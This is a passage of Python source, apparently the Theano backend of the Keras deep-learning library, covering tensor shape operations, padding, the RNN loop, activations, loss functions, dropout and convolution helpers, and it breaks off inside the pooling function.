except AttributeError:
pass
except ValueError:
pass
return T.nnet.bn.batch_normalization(x, gamma, beta, mean, sqrt(var + epsilon),
mode='high_mem')
# SHAPE OPERATIONS
def concatenate(tensors, axis=-1):
if py_all([is_sparse(x) for x in tensors]):
axis = axis % ndim(tensors[0])
if axis == 0:
return th_sparse_module.basic.vstack(tensors, format='csr')
elif axis == 1:
return th_sparse_module.basic.hstack(tensors, format='csr')
else:
raise ValueError('Invalid concat axis for sparse matrix:', axis)
else:
return T.concatenate([to_dense(x) for x in tensors], axis=axis)
def reshape(x, shape):
y = T.reshape(x, shape)
if is_explicit_shape(shape):
y._keras_shape = shape
if hasattr(x, '_uses_learning_phase'):
y._uses_learning_phase = x._uses_learning_phase
else:
y._uses_learning_phase = False
return y
def permute_dimensions(x, pattern):
"""Transpose dimensions.
pattern should be a tuple or list of
dimension indices, e.g. [0, 2, 1].
"""
# TODO: `keras_shape` inference.
pattern = tuple(pattern)
return x.dimshuffle(pattern)
def repeat_elements(x, rep, axis):
"""Repeat the elements of a tensor along an axis, like np.repeat.
If x has shape (s1, s2, s3) and axis=1, the output
will have shape (s1, s2 * rep, s3).
"""
# TODO: `keras_shape` inference.
return T.repeat(x, rep, axis=axis)
def resize_images(X, height_factor, width_factor, dim_ordering):
"""Resize the images contained in a 4D tensor of shape
- [batch, channels, height, width] (for 'th' dim_ordering)
- [batch, height, width, channels] (for 'tf' dim_ordering)
by a factor of (height_factor, width_factor). Both factors should be
positive integers.
"""
# TODO: `keras_shape` inference.
if dim_ordering == 'th':
output = repeat_elements(X, height_factor, axis=2)
output = repeat_elements(output, width_factor, axis=3)
return output
elif dim_ordering == 'tf':
output = repeat_elements(X, height_factor, axis=1)
output = repeat_elements(output, width_factor, axis=2)
return output
else:
raise ValueError('Invalid dim_ordering:', dim_ordering)
def resize_volumes(X, depth_factor, height_factor, width_factor, dim_ordering):
"""Resize the volume contained in a 5D tensor of shape
- [batch, channels, depth, height, width] (for 'th' dim_ordering)
- [batch, depth, height, width, channels] (for 'tf' dim_ordering)
by a factor of (depth_factor, height_factor, width_factor).
Both factors should be positive integers.
"""
# TODO: `keras_shape` inference.
if dim_ordering == 'th':
output = repeat_elements(X, depth_factor, axis=2)
output = repeat_elements(output, height_factor, axis=3)
output = repeat_elements(output, width_factor, axis=4)
return output
elif dim_ordering == 'tf':
output = repeat_elements(X, depth_factor, axis=1)
output = repeat_elements(output, height_factor, axis=2)
output = repeat_elements(output, width_factor, axis=3)
return output
else:
raise ValueError('Invalid dim_ordering:', dim_ordering)
def repeat(x, n):
"""Repeat a 2D tensor.
If x has shape (samples, dim) and n=2,
the output will have shape (samples, 2, dim).
"""
# TODO: `keras_shape` inference.
assert x.ndim == 2
x = x.dimshuffle((0, 'x', 1))
return T.extra_ops.repeat(x, n, axis=1)
def arange(start, stop=None, step=1, dtype='int32'):
"""Creates a 1-D tensor containing a sequence of integers.
The function arguments use the same convention as
Theano's arange: if only one argument is provided,
it is in fact the "stop" argument.
The default type of the returned tensor is 'int32' to
match TensorFlow's default.
"""
return T.arange(start, stop=stop, step=step, dtype=dtype)
def tile(x, n):
# TODO: `keras_shape` inference.
return T.tile(x, n)
def flatten(x):
# TODO: `keras_shape` inference.
return T.flatten(x)
def batch_flatten(x):
"""Turn a n-D tensor into a 2D tensor where
the first dimension is conserved.
"""
# TODO: `keras_shape` inference.
x = T.reshape(x, (x.shape[0], T.prod(x.shape) // x.shape[0]))
return x
def expand_dims(x, dim=-1):
"""Add a 1-sized dimension at index "dim".
"""
# TODO: `keras_shape` inference.
pattern = [i for i in range(x.type.ndim)]
if dim < 0:
if x.type.ndim == 0:
dim = 0
else:
dim = dim % x.type.ndim + 1
pattern.insert(dim, 'x')
return x.dimshuffle(pattern)
def squeeze(x, axis):
"""Remove a 1-dimension from the tensor at index "axis".
"""
# TODO: `keras_shape` inference.
shape = list(x.shape)
shape.pop(axis)
return T.reshape(x, tuple(shape))
def temporal_padding(x, padding=1):
"""Pad the middle dimension of a 3D tensor
with "padding" zeros left and right.
Apologies for the inane API, but Theano makes this
really hard.
"""
# TODO: `keras_shape` inference.
input_shape = x.shape
output_shape = (input_shape[0],
input_shape[1] + 2 * padding,
input_shape[2])
output = T.zeros(output_shape)
return T.set_subtensor(output[:, padding:x.shape[1] + padding, :], x)
def asymmetric_temporal_padding(x, left_pad=1, right_pad=1):
"""Pad the middle dimension of a 3D tensor
with "left_pad" zeros left and "right_pad" right.
Apologies for the inane API, but Theano makes this
really hard.
"""
# TODO: `keras_shape` inference.
input_shape = x.shape
output_shape = (input_shape[0],
input_shape[1] + left_pad + right_pad,
input_shape[2])
output = T.zeros(output_shape)
return T.set_subtensor(output[:, left_pad:x.shape[1] + left_pad, :], x)
def spatial_2d_padding(x, padding=(1, 1), dim_ordering='default'):
"""Pad the 2nd and 3rd dimensions of a 4D tensor
with "padding[0]" and "padding[1]" (resp.) zeros left and right.
"""
# TODO: `keras_shape` inference.
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering ' + str(dim_ordering))
input_shape = x.shape
if dim_ordering == 'th':
output_shape = (input_shape[0],
input_shape[1],
input_shape[2] + 2 * padding[0],
input_shape[3] + 2 * padding[1])
output = T.zeros(output_shape)
indices = (slice(None),
slice(None),
slice(padding[0], input_shape[2] + padding[0]),
slice(padding[1], input_shape[3] + padding[1]))
elif dim_ordering == 'tf':
output_shape = (input_shape[0],
input_shape[1] + 2 * padding[0],
input_shape[2] + 2 * padding[1],
input_shape[3])
output = T.zeros(output_shape)
indices = (slice(None),
slice(padding[0], input_shape[1] + padding[0]),
slice(padding[1], input_shape[2] + padding[1]),
slice(None))
else:
raise ValueError('Invalid dim_ordering:', dim_ordering)
return T.set_subtensor(output[indices], x)
def asymmetric_spatial_2d_padding(x, top_pad=1, bottom_pad=1,
left_pad=1, right_pad=1,
dim_ordering='default'):
"""Pad the rows and columns of a 4D tensor
with "top_pad", "bottom_pad", "left_pad", "right_pad" (resp.) zeros
rows on top, bottom; cols on left, right.
"""
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering ' + str(dim_ordering))
input_shape = x.shape
if dim_ordering == 'th':
output_shape = (input_shape[0],
input_shape[1],
input_shape[2] + top_pad + bottom_pad,
input_shape[3] + left_pad + right_pad)
output = T.zeros(output_shape)
indices = (slice(None),
slice(None),
slice(top_pad, input_shape[2] + top_pad),
slice(left_pad, input_shape[3] + left_pad))
elif dim_ordering == 'tf':
output_shape = (input_shape[0],
input_shape[1] + top_pad + bottom_pad,
input_shape[2] + left_pad + right_pad,
input_shape[3])
print(output_shape)
output = T.zeros(output_shape)
indices = (slice(None),
slice(top_pad, input_shape[1] + top_pad),
slice(left_pad, input_shape[2] + left_pad),
slice(None))
else:
raise ValueError('Invalid dim_ordering:', dim_ordering)
return T.set_subtensor(output[indices], x)
def spatial_3d_padding(x, padding=(1, 1, 1), dim_ordering='default'):
"""Pad the 2nd, 3rd and 4th dimensions of a 5D tensor
with "padding[0]", "padding[1]" and "padding[2]" (resp.) zeros left and right.
"""
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering ' + str(dim_ordering))
input_shape = x.shape
if dim_ordering == 'th':
output_shape = (input_shape[0],
input_shape[1],
input_shape[2] + 2 * padding[0],
input_shape[3] + 2 * padding[1],
input_shape[4] + 2 * padding[2])
output = T.zeros(output_shape)
indices = (slice(None),
slice(None),
slice(padding[0], input_shape[2] + padding[0]),
slice(padding[1], input_shape[3] + padding[1]),
slice(padding[2], input_shape[4] + padding[2]))
elif dim_ordering == 'tf':
output_shape = (input_shape[0],
input_shape[1] + 2 * padding[0],
input_shape[2] + 2 * padding[1],
input_shape[3] + 2 * padding[2],
input_shape[4])
output = T.zeros(output_shape)
indices = (slice(None),
slice(padding[0], input_shape[1] + padding[0]),
slice(padding[1], input_shape[2] + padding[1]),
slice(padding[2], input_shape[3] + padding[2]),
slice(None))
else:
raise ValueError('Invalid dim_ordering:', dim_ordering)
return T.set_subtensor(output[indices], x)
def stack(x):
return T.stack(*x)
def one_hot(indices, nb_classes):
"""Input: nD integer tensor of shape (batch_size, dim1, dim2, ... dim(n-1))
Output: (n + 1)D one hot representation of the input
with shape (batch_size, dim1, dim2, ... dim(n-1), nb_classes)
"""
input_shape = tuple((indices.shape[i] for i in range(indices.ndim)))
indices = T.flatten(indices)
oh = T.extra_ops.to_one_hot(indices, nb_classes)
oh = T.reshape(oh, input_shape + (nb_classes,))
return oh
def reverse(x, axes):
"""Reverse a tensor along the the specified axes
"""
if isinstance(axes, int):
axes = [axes]
slices = [slice(None, None, -1) if i in axes else slice(None, None, None) for i in range(x.ndim)]
return x[slices]
def pattern_broadcast(x, broatcastable):
return T.patternbroadcast(x, broatcastable)
# VALUE MANIPULATION
def get_value(x):
if not hasattr(x, 'get_value'):
raise TypeError('get_value() can only be called on a variable. '
'If you have an expression instead, use eval().')
return x.get_value()
def batch_get_value(xs):
"""Returns the value of more than one tensor variable,
as a list of Numpy arrays.
"""
return [get_value(x) for x in xs]
def set_value(x, value):
x.set_value(np.asarray(value, dtype=x.dtype))
def batch_set_value(tuples):
for x, value in tuples:
x.set_value(np.asarray(value, dtype=x.dtype))
def get_variable_shape(x):
return x.get_value(borrow=True, return_internal_type=True).shape
def print_tensor(x, message=''):
"""Print the message and the tensor when evaluated and return the same
tensor.
"""
p_op = Print(message)
return p_op(x)
# GRAPH MANIPULATION
class Function(object):
def __init__(self, inputs, outputs, updates=[], **kwargs):
unique_variables_to_update = {}
for v, nv in updates:
if v not in unique_variables_to_update:
unique_variables_to_update[v] = nv
updates = unique_variables_to_update.items()
self.function = theano.function(inputs, outputs, updates=updates,
allow_input_downcast=True,
on_unused_input='ignore',
**kwargs)
def __call__(self, inputs):
assert isinstance(inputs, (list, tuple))
return self.function(*inputs)
def function(inputs, outputs, updates=[], **kwargs):
if len(kwargs) > 0:
function_args = inspect.getargspec(theano.function)[0]
for key in kwargs.keys():
if key not in function_args:
msg = 'Invalid argument "%s" passed to K.function' % key
raise ValueError(msg)
return Function(inputs, outputs, updates=updates, **kwargs)
def gradients(loss, variables):
return T.grad(loss, variables)
def stop_gradient(variables):
"""Returns `variables` but with zero gradient with respect to every other
variables.
"""
return theano.gradient.disconnected_grad(variables)
# CONTROL FLOW
def rnn(step_function, inputs, initial_states,
go_backwards=False, mask=None, constants=None,
unroll=False, input_length=None):
"""Iterates over the time dimension of a tensor.
# Arguments
inputs: tensor of temporal data of shape (samples, time, ...)
(at least 3D).
step_function:
Parameters:
input: tensor with shape (samples, ...) (no time dimension),
representing input for the batch of samples at a certain
time step.
states: list of tensors.
Returns:
output: tensor with shape (samples, ...) (no time dimension),
new_states: list of tensors, same length and shapes
as 'states'.
initial_states: tensor with shape (samples, ...) (no time dimension),
containing the initial values for the states used in
the step function.
go_backwards: boolean. If True, do the iteration over
the time dimension in reverse order.
mask: binary tensor with shape (samples, time),
with a zero for every element that is masked.
constants: a list of constant values passed at each step.
unroll: whether to unroll the RNN or to use a symbolic loop (`scan`).
input_length: must be specified if using `unroll`.
# Returns
A tuple (last_output, outputs, new_states).
last_output: the latest output of the rnn, of shape (samples, ...)
outputs: tensor with shape (samples, time, ...) where each
entry outputs[s, t] is the output of the step function
at time t for sample s.
new_states: list of tensors, latest states returned by
the step function, of shape (samples, ...).
"""
ndim = inputs.ndim
assert ndim >= 3, 'Input should be at least 3D.'
if unroll:
if input_length is None:
raise ValueError('When specifying `unroll=True`, '
'an `input_length` '
'must be provided to `rnn`.')
axes = [1, 0] + list(range(2, ndim))
inputs = inputs.dimshuffle(axes)
if constants is None:
constants = []
if mask is not None:
if mask.ndim == ndim-1:
mask = expand_dims(mask)
assert mask.ndim == ndim
mask = mask.dimshuffle(axes)
if unroll:
indices = list(range(input_length))
if go_backwards:
indices = indices[::-1]
successive_outputs = []
successive_states = []
states = initial_states
for i in indices:
output, new_states = step_function(inputs[i], states + constants)
if len(successive_outputs) == 0:
prev_output = zeros_like(output)
else:
prev_output = successive_outputs[-1]
output = T.switch(mask[i], output, prev_output)
kept_states = []
for state, new_state in zip(states, new_states):
kept_states.append(T.switch(mask[i], new_state, state))
states = kept_states
successive_outputs.append(output)
successive_states.append(states)
outputs = T.stack(*successive_outputs)
states = []
for i in range(len(successive_states[-1])):
states.append(T.stack(*[states_at_step[i] for states_at_step in successive_states]))
else:
# build an all-zero tensor of shape (samples, output_dim)
initial_output = step_function(inputs[0], initial_states + constants)[0] * 0
# Theano gets confused by broadcasting patterns in the scan op
initial_output = T.unbroadcast(initial_output, 0, 1)
def _step(input, mask, output_tm1, *states):
output, new_states = step_function(input, states)
# output previous output if masked.
output = T.switch(mask, output, output_tm1)
return_states = []
for state, new_state in zip(states, new_states):
return_states.append(T.switch(mask, new_state, state))
return [output] + return_states
results, _ = theano.scan(
_step,
sequences=[inputs, mask],
outputs_info=[initial_output] + initial_states,
non_sequences=constants,
go_backwards=go_backwards)
# deal with Theano API inconsistency
if isinstance(results, list):
outputs = results[0]
states = results[1:]
else:
outputs = results
states = []
else:
if unroll:
indices = list(range(input_length))
if go_backwards:
indices = indices[::-1]
successive_outputs = []
successive_states = []
states = initial_states
for i in indices:
output, states = step_function(inputs[i], states + constants)
successive_outputs.append(output)
successive_states.append(states)
outputs = T.stack(*successive_outputs)
states = []
for i in range(len(successive_states[-1])):
states.append(T.stack(*[states_at_step[i] for states_at_step in successive_states]))
else:
def _step(input, *states):
output, new_states = step_function(input, states)
return [output] + new_states
results, _ = theano.scan(
_step,
sequences=inputs,
outputs_info=[None] + initial_states,
non_sequences=constants,
go_backwards=go_backwards)
# deal with Theano API inconsistency
if isinstance(results, list):
outputs = results[0]
states = results[1:]
else:
outputs = results
states = []
outputs = T.squeeze(outputs)
last_output = outputs[-1]
axes = [1, 0] + list(range(2, outputs.ndim))
outputs = outputs.dimshuffle(axes)
states = [T.squeeze(state[-1]) for state in states]
return last_output, outputs, states
def switch(condition, then_expression, else_expression):
"""condition: scalar tensor.
"""
if callable(then_expression):
then_expression = then_expression()
if callable(else_expression):
else_expression = else_expression()
return T.switch(condition, then_expression, else_expression)
def in_train_phase(x, alt):
if _LEARNING_PHASE is 1:
return x
elif _LEARNING_PHASE is 0:
return alt
if callable(x):
x = x()
if callable(alt):
alt = alt()
x = theano.ifelse.ifelse(_LEARNING_PHASE, x, alt)
x._uses_learning_phase = True
return x
def in_test_phase(x, alt):
if _LEARNING_PHASE is 1:
return alt
elif _LEARNING_PHASE is 0:
return x
if callable(x):
x = x()
if callable(alt):
alt = alt()
x = theano.ifelse.ifelse(_LEARNING_PHASE, alt, x)
x._uses_learning_phase = True
return x
# NN OPERATIONS
def _assert_has_capability(module, func):
if not hasattr(module, func):
raise EnvironmentError(
'It looks like like your version of '
'Theano is out of date. '
'Install the latest version with:\n'
'pip install git+git://github.com/Theano/Theano.git '
'--upgrade --no-deps')
def elu(x, alpha=1.0):
""" Exponential linear unit
# Arguments
x: Tensor to compute the activation function for.
alpha: scalar
"""
_assert_has_capability(T.nnet, 'elu')
return T.nnet.elu(x, alpha)
def relu(x, alpha=0., max_value=None):
_assert_has_capability(T.nnet, 'relu')
x = T.nnet.relu(x, alpha)
if max_value is not None:
x = T.minimum(x, max_value)
return x
def softmax(x):
return T.nnet.softmax(x)
def softplus(x):
return T.nnet.softplus(x)
def softsign(x):
return T_softsign(x)
def categorical_crossentropy(output, target, from_logits=False):
if from_logits:
output = T.nnet.softmax(output)
else:
# scale preds so that the class probas of each sample sum to 1
output /= output.sum(axis=-1, keepdims=True)
# avoid numerical instability with _EPSILON clipping
output = T.clip(output, _EPSILON, 1.0 - _EPSILON)
return T.nnet.categorical_crossentropy(output, target)
def sparse_categorical_crossentropy(output, target, from_logits=False):
target = T.cast(T.flatten(target), 'int32')
target = T.extra_ops.to_one_hot(target, nb_class=output.shape[-1])
target = reshape(target, shape(output))
return categorical_crossentropy(output, target, from_logits)
def binary_crossentropy(output, target, from_logits=False):
if from_logits:
output = T.nnet.sigmoid(output)
# avoid numerical instability with _EPSILON clipping
output = T.clip(output, _EPSILON, 1.0 - _EPSILON)
return T.nnet.binary_crossentropy(output, target)
def sigmoid(x):
return T.nnet.sigmoid(x)
def hard_sigmoid(x):
return T.nnet.hard_sigmoid(x)
def tanh(x):
return T.tanh(x)
def dropout(x, level, noise_shape=None, seed=None):
"""Sets entries in `x` to zero at random,
while scaling the entire tensor.
# Arguments
x: tensor
level: fraction of the entries in the tensor
that will be set to 0.
noise_shape: shape for randomly generated keep/drop flags,
must be broadcastable to the shape of `x`
seed: random seed to ensure determinism.
"""
if level < 0. or level >= 1:
raise ValueError('Dropout level must be in interval [0, 1[.')
if seed is None:
seed = np.random.randint(1, 10e6)
if isinstance(noise_shape, list):
noise_shape = tuple(noise_shape)
rng = RandomStreams(seed=seed)
retain_prob = 1. - level
if noise_shape is None:
random_tensor = rng.binomial(x.shape, p=retain_prob, dtype=x.dtype)
else:
random_tensor = rng.binomial(noise_shape, p=retain_prob, dtype=x.dtype)
random_tensor = T.patternbroadcast(random_tensor,
[dim == 1 for dim in noise_shape])
x *= random_tensor
x /= retain_prob
return x
def l2_normalize(x, axis):
norm = T.sqrt(T.sum(T.square(x), axis=axis, keepdims=True))
return x / norm
def in_top_k(predictions, targets, k):
"""Returns whether the `targets` are in the top `k` `predictions`
# Arguments
predictions: A tensor of shape batch_size x classess and type float32.
targets: A tensor of shape batch_size and type int32 or int64.
k: An int, number of top elements to consider.
# Returns
A tensor of shape batch_size and type int. output_i is 1 if
targets_i is within top-k values of predictions_i
"""
predictions_top_k = T.argsort(predictions)[:, -k:]
result, _ = theano.map(lambda prediction, target: any(equal(prediction, target)), sequences=[predictions_top_k, targets])
return result
# CONVOLUTIONS
def _preprocess_conv2d_input(x, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH input shape: (samples, input_depth, rows, cols)
# TF input shape: (samples, rows, cols, input_depth)
x = x.dimshuffle((0, 3, 1, 2))
return x
def _preprocess_conv3d_input(x, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH input shape: (samples, input_depth, rows, cols, slices)
# TF input shape: (samples, rows, cols, slices, input_depth)
x = x.dimshuffle((0, 4, 1, 2, 3))
return x
def _preprocess_conv2d_kernel(kernel, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH kernel shape: (depth, input_depth, rows, cols)
# TF kernel shape: (rows, cols, input_depth, depth)
kernel = kernel.dimshuffle((3, 2, 0, 1))
return kernel
def _preprocess_conv3d_kernel(kernel, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH kernel shape: (depth, input_depth, rows, cols, slices)
# TF kernel shape: (rows, cols, slices, input_depth, depth)
kernel = kernel.dimshuffle((4, 3, 0, 1, 2))
return kernel
def _preprocess_border_mode(border_mode):
if border_mode == 'same':
th_border_mode = 'half'
elif border_mode == 'valid':
th_border_mode = 'valid'
elif border_mode == 'full':
th_border_mode = 'full'
else:
raise ValueError('Border mode not supported:', str(border_mode))
return th_border_mode
def _preprocess_conv2d_image_shape(dim_ordering, image_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if image_shape:
image_shape = (image_shape[0], image_shape[3],
image_shape[1], image_shape[2])
if image_shape is not None:
image_shape = tuple(int_or_none(v) for v in image_shape)
return image_shape
def _preprocess_conv3d_volume_shape(dim_ordering, volume_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if volume_shape:
volume_shape = (volume_shape[0], volume_shape[4],
volume_shape[1], volume_shape[2], volume_shape[3])
if volume_shape is not None:
volume_shape = tuple(int_or_none(v) for v in volume_shape)
return volume_shape
def _preprocess_conv2d_filter_shape(dim_ordering, filter_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if filter_shape:
filter_shape = (filter_shape[3], filter_shape[2],
filter_shape[0], filter_shape[1])
if filter_shape is not None:
filter_shape = tuple(int_or_none(v) for v in filter_shape)
return filter_shape
def _preprocess_conv3d_filter_shape(dim_ordering, filter_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if filter_shape:
filter_shape = (filter_shape[4], filter_shape[3],
filter_shape[0], filter_shape[1], filter_shape[2])
if filter_shape is not None:
filter_shape = tuple(int_or_none(v) for v in filter_shape)
return filter_shape
def _postprocess_conv2d_output(conv_out, x, border_mode, np_kernel, strides, dim_ordering):
if border_mode == 'same':
if np_kernel.shape[2] % 2 == 0:
conv_out = conv_out[:, :, :(x.shape[2] + strides[0] - 1) // strides[0], :]
if np_kernel.shape[3] % 2 == 0:
conv_out = conv_out[:, :, :, :(x.shape[3] + strides[1] - 1) // strides[1]]
if dim_ordering == 'tf':
conv_out = conv_out.dimshuffle((0, 2, 3, 1))
return conv_out
def _postprocess_conv3d_output(conv_out, x, border_mode, np_kernel, strides, dim_ordering):
if border_mode == 'same':
if np_kernel.shape[2] % 2 == 0:
conv_out = conv_out[:, :, :(x.shape[2] + strides[0] - 1) // strides[0], :, :]
if np_kernel.shape[3] % 2 == 0:
conv_out = conv_out[:, :, :, :(x.shape[3] + strides[1] - 1) // strides[1], :]
if np_kernel.shape[4] % 2 == 0:
conv_out = conv_out[:, :, :, :, :(x.shape[4] + strides[2] - 1) // strides[2]]
if dim_ordering == 'tf':
conv_out = conv_out.dimshuffle((0, 2, 3, 4, 1))
return conv_out
def conv1d(x, kernel, stride=1, border_mode='valid',
image_shape=None, filter_shape=None):
"""1D convolution.
# Arguments
kernel: kernel tensor.
strides: stride integer.
border_mode: string, "same" or "valid".
"""
raise NotImplementedError
def conv2d(x, kernel, strides=(1, 1), border_mode='valid',
dim_ordering='default', image_shape=None,
filter_shape=None, filter_dilation=(1, 1)):
"""2D convolution.
# Arguments
kernel: kernel tensor.
strides: strides tuple.
border_mode: string, "same" or "valid".
dim_ordering: "tf" or "th".
Whether to use Theano or TensorFlow dimension ordering
in inputs/kernels/ouputs.
"""
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering ', dim_ordering)
x = _preprocess_conv2d_input(x, dim_ordering)
kernel = _preprocess_conv2d_kernel(kernel, dim_ordering)
th_border_mode = _preprocess_border_mode(border_mode)
np_kernel = kernel.eval()
image_shape = _preprocess_conv2d_image_shape(dim_ordering, image_shape)
filter_shape = _preprocess_conv2d_filter_shape(dim_ordering, filter_shape)
# TODO: remove the if statement when theano with no filter dilation is deprecated.
if filter_dilation == (1, 1):
conv_out = T.nnet.conv2d(x, kernel,
border_mode=th_border_mode,
subsample=strides,
input_shape=image_shape,
filter_shape=filter_shape)
else:
conv_out = T.nnet.conv2d(x, kernel,
border_mode=th_border_mode,
subsample=strides,
input_shape=image_shape,
filter_shape=filter_shape,
filter_dilation=filter_dilation)
conv_out = _postprocess_conv2d_output(conv_out, x, border_mode, np_kernel,
strides, dim_ordering)
return conv_out
def deconv2d(x, kernel, output_shape, strides=(1, 1),
border_mode='valid',
dim_ordering='default',
image_shape=None, filter_shape=None):
"""2D deconvolution (transposed convolution).
# Arguments
kernel: kernel tensor.
output_shape: desired dimensions of output.
strides: strides tuple.
border_mode: string, "same" or "valid".
dim_ordering: "tf" or "th".
Whether to use Theano or TensorFlow dimension ordering
in inputs/kernels/ouputs.
"""
flip_filters = False
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering ' + dim_ordering)
x = _preprocess_conv2d_input(x, dim_ordering)
kernel = _preprocess_conv2d_kernel(kernel, dim_ordering)
kernel = kernel.dimshuffle((1, 0, 2, 3))
th_border_mode = _preprocess_border_mode(border_mode)
np_kernel = kernel.eval()
filter_shape = _preprocess_conv2d_filter_shape(dim_ordering, filter_shape)
filter_shape = tuple(filter_shape[i] for i in (1, 0, 2, 3))
op = T.nnet.abstract_conv.AbstractConv2d_gradInputs(imshp=output_shape,
kshp=filter_shape,
subsample=strides,
border_mode=th_border_mode,
filter_flip=not flip_filters)
conv_out = op(kernel, x, output_shape[2:])
conv_out = _postprocess_conv2d_output(conv_out, x, border_mode, np_kernel,
strides, dim_ordering)
return conv_out
def atrous_conv2d(x, kernel, rate=1,
border_mode='valid',
dim_ordering='default',
image_shape=None, filter_shape=None):
raise NotImplementedError
def separable_conv2d(x, depthwise_kernel, pointwise_kernel, strides=(1, 1),
border_mode='valid', dim_ordering='default'):
raise NotImplementedError
def conv3d(x, kernel, strides=(1, 1, 1),
border_mode='valid', dim_ordering='default',
volume_shape=None, filter_shape=None,
filter_dilation=(1, 1, 1)):
"""3D convolution.
# Arguments
kernel: kernel tensor.
strides: strides tuple.
border_mode: string, "same" or "valid".
dim_ordering: "tf" or "th".
Whether to use Theano or TensorFlow dimension ordering
in inputs/kernels/ouputs.
"""
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
# TODO: remove this if statement when Theano without AbstractConv3d is deprecated
if not hasattr(T.nnet, 'conv3d'):
if filter_dilation != (1, 1, 1):
raise ValueError('conv3d with filter dilation requires Theano '
'0.9.0dev3 or newer.')
return _old_theano_conv3d(x, kernel, strides, border_mode,
dim_ordering, volume_shape, filter_shape)
x = _preprocess_conv3d_input(x, dim_ordering)
kernel = _preprocess_conv3d_kernel(kernel, dim_ordering)
th_border_mode = _preprocess_border_mode(border_mode)
np_kernel = kernel.eval()
volume_shape = _preprocess_conv3d_volume_shape(dim_ordering, volume_shape)
filter_shape = _preprocess_conv3d_filter_shape(dim_ordering, filter_shape)
conv_out = T.nnet.conv3d(x, kernel,
border_mode=th_border_mode,
subsample=strides,
input_shape=volume_shape,
filter_shape=filter_shape,
filter_dilation=filter_dilation)
conv_out = _postprocess_conv3d_output(conv_out, x, border_mode, np_kernel,
strides, dim_ordering)
return conv_out
# TODO: remove this function when theano without AbstractConv3d is deprecated
def _old_theano_conv3d(x, kernel, strides=(1, 1, 1),
border_mode='valid', dim_ordering='default',
volume_shape=None, filter_shape=None):
"""
Run on cuDNN if available.
border_mode: string, "same" or "valid".
"""
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
if border_mode not in {'same', 'valid'}:
raise ValueError('Invalid border mode:', border_mode)
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH input shape: (samples, input_depth, conv_dim1, conv_dim2, conv_dim3)
# TF input shape: (samples, conv_dim1, conv_dim2, conv_dim3, input_depth)
# TH kernel shape: (out_depth, input_depth, kernel_dim1, kernel_dim2, kernel_dim3)
# TF kernel shape: (kernel_dim1, kernel_dim2, kernel_dim3, input_depth, out_depth)
x = x.dimshuffle((0, 4, 1, 2, 3))
kernel = kernel.dimshuffle((4, 3, 0, 1, 2))
if volume_shape:
volume_shape = (volume_shape[0], volume_shape[4],
volume_shape[1], volume_shape[2], volume_shape[3])
if filter_shape:
filter_shape = (filter_shape[4], filter_shape[3],
filter_shape[0], filter_shape[1], filter_shape[2])
if border_mode == 'same':
assert(strides == (1, 1, 1))
pad_dim1 = (kernel.shape[2] - 1)
pad_dim2 = (kernel.shape[3] - 1)
pad_dim3 = (kernel.shape[4] - 1)
output_shape = (x.shape[0], x.shape[1],
x.shape[2] + pad_dim1,
x.shape[3] + pad_dim2,
x.shape[4] + pad_dim3)
output = T.zeros(output_shape)
indices = (slice(None), slice(None),
slice(pad_dim1 // 2, x.shape[2] + pad_dim1 // 2),
slice(pad_dim2 // 2, x.shape[3] + pad_dim2 // 2),
slice(pad_dim3 // 2, x.shape[4] + pad_dim3 // 2))
x = T.set_subtensor(output[indices], x)
border_mode = 'valid'
border_mode_3d = (border_mode, border_mode, border_mode)
conv_out = conv3d2d.conv3d(signals=x.dimshuffle(0, 2, 1, 3, 4),
filters=kernel.dimshuffle(0, 2, 1, 3, 4),
border_mode=border_mode_3d)
conv_out = conv_out.dimshuffle(0, 2, 1, 3, 4)
# support strides by manually slicing the output
if strides != (1, 1, 1):
conv_out = conv_out[:, :, ::strides[0], ::strides[1], ::strides[2]]
if dim_ordering == 'tf':
conv_out = conv_out.dimshuffle((0, 2, 3, 4, 1))
return conv_out
def pool2d(x, pool_size, strides=(1, 1), border_mode='valid',
dim_ordering='default', pool_mode='max'):
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
assert pool_size[0] >= 1 and pool_size[1] >= 1
if border_mode == 'same':
w_pad = pool_size[0] - 2 if pool_size[0] > 2 and pool_size[0] % 2 == 1 else pool_size[0] - 1
h_pad = pool_size[1] - 2 if pool_size[1] > 2 and pool_size[1] % 2 == 1 else pool_size[1] - 1
padding = (w_pad, h_pad)
elif border_mode == 'valid':
padding = (0, 0)
else:
raise ValueError('Invalid border mode:', border_mode)
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
if dim_ordering == 'tf':
x = x.dimshuffle((0, 3, 1, 2))
if pool_mode == 'max':
